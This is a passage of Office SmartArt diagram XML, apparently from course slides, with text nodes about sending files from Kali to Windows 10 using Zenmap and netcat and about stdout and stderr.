          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C77B16AE-79F3-4A91-A144-E4962EB8C3EC}" type="pres">
      <dgm:prSet presAssocID="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" presName="dummyMaxCanvas" presStyleCnt="0">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4AED1A57-D364-4000-87E1-862042A86B45}" type="pres">
      <dgm:prSet presAssocID="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" presName="FourNodes_1" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C952050B-D692-42B2-B6C6-D9FF89C7CC10}" type="pres">
      <dgm:prSet presAssocID="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" presName="FourNodes_2" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F4D5357D-4E8C-4757-8268-C80192744DD3}" type="pres">
      <dgm:prSet presAssocID="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" presName="FourNodes_3" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{09FD2FBB-6BDF-47D8-9E72-5B5D698C23DC}" type="pres">
      <dgm:prSet presAssocID="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" presName="FourNodes_4" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AAE43954-22E9-4644-92C8-9F7A82CCCAFB}" type="pres">
      <dgm:prSet presAssocID="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" presName="FourConn_1-2" presStyleLbl="fgAccFollowNode1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8658780E-DE24-42FB-9CF8-5E7F9B2B1738}" type="pres">
      <dgm:prSet presAssocID="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" presName="FourConn_2-3" presStyleLbl="fgAccFollowNode1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{51BA17FE-5A34-42DF-BDD7-835351B0DB1D}" type="pres">
      <dgm:prSet presAssocID="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" presName="FourConn_3-4" presStyleLbl="fgAccFollowNode1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2E23091E-3B67-44AE-A881-F80BBE5A3651}" type="pres">
      <dgm:prSet presAssocID="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" presName="FourNodes_1_text" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{69513F20-B31F-4051-9885-18110AD85674}" type="pres">
      <dgm:prSet presAssocID="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" presName="FourNodes_2_text" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5FC85B4D-AD90-452B-8C23-875E5C090D62}" type="pres">
      <dgm:prSet presAssocID="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" presName="FourNodes_3_text" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FC88EE28-D09C-4C12-BBD0-C28E0CC33576}" type="pres">
      <dgm:prSet presAssocID="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" presName="FourNodes_4_text" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{8E4D4E13-7B87-40C4-839A-B60BD86EA001}" srcId="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" destId="{82D17439-F26F-4E24-A7CC-217EAA8E9CFB}" srcOrd="3" destOrd="0" parTransId="{411B400C-231E-453F-91CE-5A6C51D34DC3}" sibTransId="{C32BD346-8926-4CB0-B79C-6724304B462F}"/>
    <dgm:cxn modelId="{DD7E271C-FF34-4593-B226-13913C49D79E}" type="presOf" srcId="{6A85E831-83AC-4CBE-A04A-158534B0B496}" destId="{F4D5357D-4E8C-4757-8268-C80192744DD3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{9A7EC821-EE47-42E5-8731-C3AE4A48640F}" srcId="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" destId="{1CCC89E2-AFCB-4F1D-BE15-C30775E14DD5}" srcOrd="1" destOrd="0" parTransId="{37D8D7F6-82EC-4278-A3CE-35C0D79BBAA7}" sibTransId="{F0AE10F1-4F4D-491A-B374-C2F63919659A}"/>
    <dgm:cxn modelId="{23A21A2E-69CE-46CD-8AA2-2DE4FA99C049}" srcId="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" destId="{6A85E831-83AC-4CBE-A04A-158534B0B496}" srcOrd="2" destOrd="0" parTransId="{C8708527-29F1-45AD-84C4-85CC773FA03E}" sibTransId="{A8947B02-B569-42F0-BA8D-7C4208421369}"/>
    <dgm:cxn modelId="{53A3EE60-046E-4FE6-B60D-D539BA0ACD63}" type="presOf" srcId="{1CCC89E2-AFCB-4F1D-BE15-C30775E14DD5}" destId="{C952050B-D692-42B2-B6C6-D9FF89C7CC10}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{6E031842-E96A-4FBF-BDFB-EB75AF9D29AE}" type="presOf" srcId="{A8947B02-B569-42F0-BA8D-7C4208421369}" destId="{51BA17FE-5A34-42DF-BDD7-835351B0DB1D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{8578BD45-748A-40FB-A8CD-2C2E3FA856C7}" type="presOf" srcId="{82D17439-F26F-4E24-A7CC-217EAA8E9CFB}" destId="{09FD2FBB-6BDF-47D8-9E72-5B5D698C23DC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{1603E349-5EF4-450F-9EF7-F6359EA66DC0}" type="presOf" srcId="{7F95AD54-CC49-43B7-ABDC-9E013F437FDB}" destId="{AAE43954-22E9-4644-92C8-9F7A82CCCAFB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{F8B62351-4458-44FE-8FD3-35F22C53C5FC}" srcId="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" destId="{47510470-AECF-4261-9C7F-974910BA2CE6}" srcOrd="0" destOrd="0" parTransId="{A119B126-E38B-44E9-B96B-788AABCDDB69}" sibTransId="{7F95AD54-CC49-43B7-ABDC-9E013F437FDB}"/>
    <dgm:cxn modelId="{127B6454-AA25-4CA0-8F17-47C2B967F9E7}" type="presOf" srcId="{47510470-AECF-4261-9C7F-974910BA2CE6}" destId="{4AED1A57-D364-4000-87E1-862042A86B45}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{1775C784-B5A4-4958-95AF-D2511D2CD4B2}" type="presOf" srcId="{6A85E831-83AC-4CBE-A04A-158534B0B496}" destId="{5FC85B4D-AD90-452B-8C23-875E5C090D62}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{8DB1D8B9-3745-4F1D-BA6E-33FD0309135F}" type="presOf" srcId="{73DD95D1-0E6C-4B88-BBA5-0D119E601AC8}" destId="{53DF1049-0C87-4851-A89E-3D9668C12AE9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{78FA3FEC-0C76-4E9F-94D7-69B245D272FC}" type="presOf" srcId="{82D17439-F26F-4E24-A7CC-217EAA8E9CFB}" destId="{FC88EE28-D09C-4C12-BBD0-C28E0CC33576}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{89E413EE-5EC5-42E8-B5BB-55F1700383DE}" type="presOf" srcId="{47510470-AECF-4261-9C7F-974910BA2CE6}" destId="{2E23091E-3B67-44AE-A881-F80BBE5A3651}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{1BCE97F2-9021-4BF0-8713-DDD5EC600F3E}" type="presOf" srcId="{F0AE10F1-4F4D-491A-B374-C2F63919659A}" destId="{8658780E-DE24-42FB-9CF8-5E7F9B2B1738}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{363FA6F9-2C89-471D-8192-441CBEEA7AE2}" type="presOf" srcId="{1CCC89E2-AFCB-4F1D-BE15-C30775E14DD5}" destId="{69513F20-B31F-4051-9885-18110AD85674}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{5B1FAC3F-7709-42E0-91A8-259E5D33DB30}" type="presParOf" srcId="{53DF1049-0C87-4851-A89E-3D9668C12AE9}" destId="{C77B16AE-79F3-4A91-A144-E4962EB8C3EC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{FCE132D7-863E-4E8B-AA37-B8B7C4D669F6}" type="presParOf" srcId="{53DF1049-0C87-4851-A89E-3D9668C12AE9}" destId="{4AED1A57-D364-4000-87E1-862042A86B45}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{E81D5F41-4C91-4098-A467-83E6A3081B94}" type="presParOf" srcId="{53DF1049-0C87-4851-A89E-3D9668C12AE9}" destId="{C952050B-D692-42B2-B6C6-D9FF89C7CC10}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{5E237BCC-CAE9-4E7B-BACE-A6E13D526386}" type="presParOf" srcId="{53DF1049-0C87-4851-A89E-3D9668C12AE9}" destId="{F4D5357D-4E8C-4757-8268-C80192744DD3}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{52ECEB94-F460-47DE-874A-6DE1186931E0}" type="presParOf" srcId="{53DF1049-0C87-4851-A89E-3D9668C12AE9}" destId="{09FD2FBB-6BDF-47D8-9E72-5B5D698C23DC}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{9C34433D-CA90-4F14-8F50-C2F6A826C539}" type="presParOf" srcId="{53DF1049-0C87-4851-A89E-3D9668C12AE9}" destId="{AAE43954-22E9-4644-92C8-9F7A82CCCAFB}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{27D19FCB-C8E7-4D3F-A214-97762FEA10F9}" type="presParOf" srcId="{53DF1049-0C87-4851-A89E-3D9668C12AE9}" destId="{8658780E-DE24-42FB-9CF8-5E7F9B2B1738}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{A002E0A0-488A-4FDA-8D14-95B9E40E5ACC}" type="presParOf" srcId="{53DF1049-0C87-4851-A89E-3D9668C12AE9}" destId="{51BA17FE-5A34-42DF-BDD7-835351B0DB1D}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{9857168E-8529-43FB-82E2-A39E00C7A2B0}" type="presParOf" srcId="{53DF1049-0C87-4851-A89E-3D9668C12AE9}" destId="{2E23091E-3B67-44AE-A881-F80BBE5A3651}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{488336FD-6CC3-47F9-9DA5-DE729E3B38F0}" type="presParOf" srcId="{53DF1049-0C87-4851-A89E-3D9668C12AE9}" destId="{69513F20-B31F-4051-9885-18110AD85674}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{86071FAC-0ABD-47CD-8724-6A101D93A908}" type="presParOf" srcId="{53DF1049-0C87-4851-A89E-3D9668C12AE9}" destId="{5FC85B4D-AD90-452B-8C23-875E5C090D62}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{8686EC58-807E-4CFA-B58F-65AB80D1BE26}" type="presParOf" srcId="{53DF1049-0C87-4851-A89E-3D9668C12AE9}" destId="{FC88EE28-D09C-4C12-BBD0-C28E0CC3357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46792E-CA65-440B-847E-AD4694442936}"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63D80E64-DD00-42DD-B795-D6AA44BF96A4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Send files from Kali to Windows 10</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EDF64EAE-60EE-4640-9E55-C825FF7D01C9}" type="parTrans" cxnId="{79C802F5-6E66-46E5-A4F5-0D67210AEDB9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2AB15634-F90E-451B-8B71-ADBA01BAD767}" type="sibTrans" cxnId="{79C802F5-6E66-46E5-A4F5-0D67210AEDB9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{18F2E0DA-44E8-4A84-A275-5D37845F8944}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Solution</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{282DA01B-A8A7-4536-B0DB-7F8E171586C3}" type="parTrans" cxnId="{18868971-9E3F-4A18-8B5D-615F14208C50}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F9E628CE-E5D0-402F-95CC-120699CC8527}" type="sibTrans" cxnId="{18868971-9E3F-4A18-8B5D-615F14208C50}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{20EB9557-8B9A-41A5-8A43-9E2BAE55A361}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Use Zenmap</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AEDA0FA1-9AAC-44CD-8FEC-4E656B01E5B9}" type="parTrans" cxnId="{DFFF16F2-E74A-43A9-8552-9FB313F35B4A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A32EED2E-CAAF-407C-A6A7-F8C9137A93E2}" type="sibTrans" cxnId="{DFFF16F2-E74A-43A9-8552-9FB313F35B4A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1DB46F20-B44C-4E56-92C5-33045243A5B3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>netcat is integrated into Zenmap</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0ED15E3C-C65B-4F0F-B188-00B45278DDE9}" type="parTrans" cxnId="{FB0F2E76-B8CF-4051-AD97-5BDE0E899127}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B581073C-F274-47E7-A2CF-9042F936B3AD}" type="sibTrans" cxnId="{FB0F2E76-B8CF-4051-AD97-5BDE0E899127}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{62C27EA3-5C47-4B76-990C-1E4AA5FA057A}" type="pres">
      <dgm:prSet presAssocID="{A846792E-CA65-440B-847E-AD4694442936}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{23D6FAD6-574B-4A2D-8C71-F43978323DD0}" type="pres">
      <dgm:prSet presAssocID="{18F2E0DA-44E8-4A84-A275-5D37845F8944}" presName="boxAndChildren" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4858B37C-7502-4138-AF92-C6659A5B3939}" type="pres">
      <dgm:prSet presAssocID="{18F2E0DA-44E8-4A84-A275-5D37845F8944}" presName="parentTextBox" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{99AFE39A-9BA9-4D2F-85A1-DB783B7FF4B8}" type="pres">
      <dgm:prSet presAssocID="{18F2E0DA-44E8-4A84-A275-5D37845F8944}" presName="entireBox" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{47AC8640-7DC9-4919-8E4A-898050032FA4}" type="pres">
      <dgm:prSet presAssocID="{18F2E0DA-44E8-4A84-A275-5D37845F8944}" presName="descendantBox" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{976D2CC0-DBFD-44F6-8CD0-2010504F5D42}" type="pres">
      <dgm:prSet presAssocID="{20EB9557-8B9A-41A5-8A43-9E2BAE55A361}" presName="childTextBox" presStyleLbl="fgAccFollowNode1" presStyleIdx="0" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{14456EC4-9209-4B9A-9130-1D2B6232CD43}" type="pres">
      <dgm:prSet presAssocID="{1DB46F20-B44C-4E56-92C5-33045243A5B3}" presName="childTextBox" presStyleLbl="fgAccFollowNode1" presStyleIdx="1" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6AD87078-5E1F-4890-AF77-2E2BB5919009}" type="pres">
      <dgm:prSet presAssocID="{2AB15634-F90E-451B-8B71-ADBA01BAD767}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2224FA37-C588-4BCE-8C61-891A39679EAB}" type="pres">
      <dgm:prSet presAssocID="{63D80E64-DD00-42DD-B795-D6AA44BF96A4}" presName="arrowAndChildren" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{840DB5AA-C142-4CA9-A04D-786A8A72D61B}" type="pres">
      <dgm:prSet presAssocID="{63D80E64-DD00-42DD-B795-D6AA44BF96A4}" presName="parentTextArrow" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{7F45812D-58B5-4091-8C17-552A3F86B449}" type="presOf" srcId="{18F2E0DA-44E8-4A84-A275-5D37845F8944}" destId="{99AFE39A-9BA9-4D2F-85A1-DB783B7FF4B8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{18868971-9E3F-4A18-8B5D-615F14208C50}" srcId="{A846792E-CA65-440B-847E-AD4694442936}" destId="{18F2E0DA-44E8-4A84-A275-5D37845F8944}" srcOrd="1" destOrd="0" parTransId="{282DA01B-A8A7-4536-B0DB-7F8E171586C3}" sibTransId="{F9E628CE-E5D0-402F-95CC-120699CC8527}"/>
    <dgm:cxn modelId="{FB0F2E76-B8CF-4051-AD97-5BDE0E899127}" srcId="{18F2E0DA-44E8-4A84-A275-5D37845F8944}" destId="{1DB46F20-B44C-4E56-92C5-33045243A5B3}" srcOrd="1" destOrd="0" parTransId="{0ED15E3C-C65B-4F0F-B188-00B45278DDE9}" sibTransId="{B581073C-F274-47E7-A2CF-9042F936B3AD}"/>
    <dgm:cxn modelId="{C0FF9D91-D80C-4DB9-9B49-9A0CD303BCBE}" type="presOf" srcId="{63D80E64-DD00-42DD-B795-D6AA44BF96A4}" destId="{840DB5AA-C142-4CA9-A04D-786A8A72D61B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{1631329E-4932-43D2-90B6-2898A9623279}" type="presOf" srcId="{20EB9557-8B9A-41A5-8A43-9E2BAE55A361}" destId="{976D2CC0-DBFD-44F6-8CD0-2010504F5D42}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{BD3E2DBA-A0E9-434C-9A95-28BBD36F6DC7}" type="presOf" srcId="{1DB46F20-B44C-4E56-92C5-33045243A5B3}" destId="{14456EC4-9209-4B9A-9130-1D2B6232CD43}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{A7B8B5D5-C07C-42C3-AA44-EF03E6A9A265}" type="presOf" srcId="{A846792E-CA65-440B-847E-AD4694442936}" destId="{62C27EA3-5C47-4B76-990C-1E4AA5FA057A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{C49B57E5-ABE2-4EE7-8565-190D38C05239}" type="presOf" srcId="{18F2E0DA-44E8-4A84-A275-5D37845F8944}" destId="{4858B37C-7502-4138-AF92-C6659A5B3939}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{DFFF16F2-E74A-43A9-8552-9FB313F35B4A}" srcId="{18F2E0DA-44E8-4A84-A275-5D37845F8944}" destId="{20EB9557-8B9A-41A5-8A43-9E2BAE55A361}" srcOrd="0" destOrd="0" parTransId="{AEDA0FA1-9AAC-44CD-8FEC-4E656B01E5B9}" sibTransId="{A32EED2E-CAAF-407C-A6A7-F8C9137A93E2}"/>
    <dgm:cxn modelId="{79C802F5-6E66-46E5-A4F5-0D67210AEDB9}" srcId="{A846792E-CA65-440B-847E-AD4694442936}" destId="{63D80E64-DD00-42DD-B795-D6AA44BF96A4}" srcOrd="0" destOrd="0" parTransId="{EDF64EAE-60EE-4640-9E55-C825FF7D01C9}" sibTransId="{2AB15634-F90E-451B-8B71-ADBA01BAD767}"/>
    <dgm:cxn modelId="{A99CF836-7E4F-483F-AC7C-B989142785EA}" type="presParOf" srcId="{62C27EA3-5C47-4B76-990C-1E4AA5FA057A}" destId="{23D6FAD6-574B-4A2D-8C71-F43978323DD0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{E5E58408-9E07-489F-8C1F-D80DB66332DB}" type="presParOf" srcId="{23D6FAD6-574B-4A2D-8C71-F43978323DD0}" destId="{4858B37C-7502-4138-AF92-C6659A5B3939}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{2AB7DDED-18FC-458E-A7CB-42A377730B35}" type="presParOf" srcId="{23D6FAD6-574B-4A2D-8C71-F43978323DD0}" destId="{99AFE39A-9BA9-4D2F-85A1-DB783B7FF4B8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{3244CA2B-35AA-47C5-B904-29DC70BD4E78}" type="presParOf" srcId="{23D6FAD6-574B-4A2D-8C71-F43978323DD0}" destId="{47AC8640-7DC9-4919-8E4A-898050032FA4}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{C9A20CEA-B83C-42D5-A4D6-400AC3495328}" type="presParOf" srcId="{47AC8640-7DC9-4919-8E4A-898050032FA4}" destId="{976D2CC0-DBFD-44F6-8CD0-2010504F5D42}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{FB4A0E52-BBCD-40A5-92AC-50A26C149616}" type="presParOf" srcId="{47AC8640-7DC9-4919-8E4A-898050032FA4}" destId="{14456EC4-9209-4B9A-9130-1D2B6232CD43}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{E8C05F94-83BA-4D2D-A363-A957B594D120}" type="presParOf" srcId="{62C27EA3-5C47-4B76-990C-1E4AA5FA057A}" destId="{6AD87078-5E1F-4890-AF77-2E2BB5919009}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{066BDE69-0A78-4D9B-9457-80AB8288B1CE}" type="presParOf" srcId="{62C27EA3-5C47-4B76-990C-1E4AA5FA057A}" destId="{2224FA37-C588-4BCE-8C61-891A39679EAB}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{7C95E091-D123-48DA-A29E-5902B915D01A}" type="presParOf" srcId="{2224FA37-C588-4BCE-8C61-891A39679EAB}" destId="{840DB5AA-C142-4CA9-A04D-786A8A72D61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2D1FCA-0D40-4885-9502-EE3710779E2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B2423C-27B3-411F-817F-7C361E1F91FC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>There are two places programs send output to: Standard output (stdout) and Standard Error (stderr);</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{97E8125D-D4FF-4570-8E54-688A28EBE19C}" type="parTrans" cxnId="{1AFD7B3D-68FD-4693-93CF-E56ED4AE1DFC}">
      <dgm:prSet/>
